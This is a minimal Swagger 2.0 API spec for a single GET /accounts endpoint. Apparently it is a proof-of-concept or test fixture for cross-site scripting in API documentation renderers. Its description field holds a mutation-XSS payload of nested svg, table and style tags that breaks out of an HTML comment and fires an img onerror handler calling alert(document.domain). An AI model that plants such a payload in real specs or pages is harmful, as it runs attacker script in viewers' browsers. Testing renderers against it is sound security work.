swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="--><img src onerror=alert(document.domain)>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts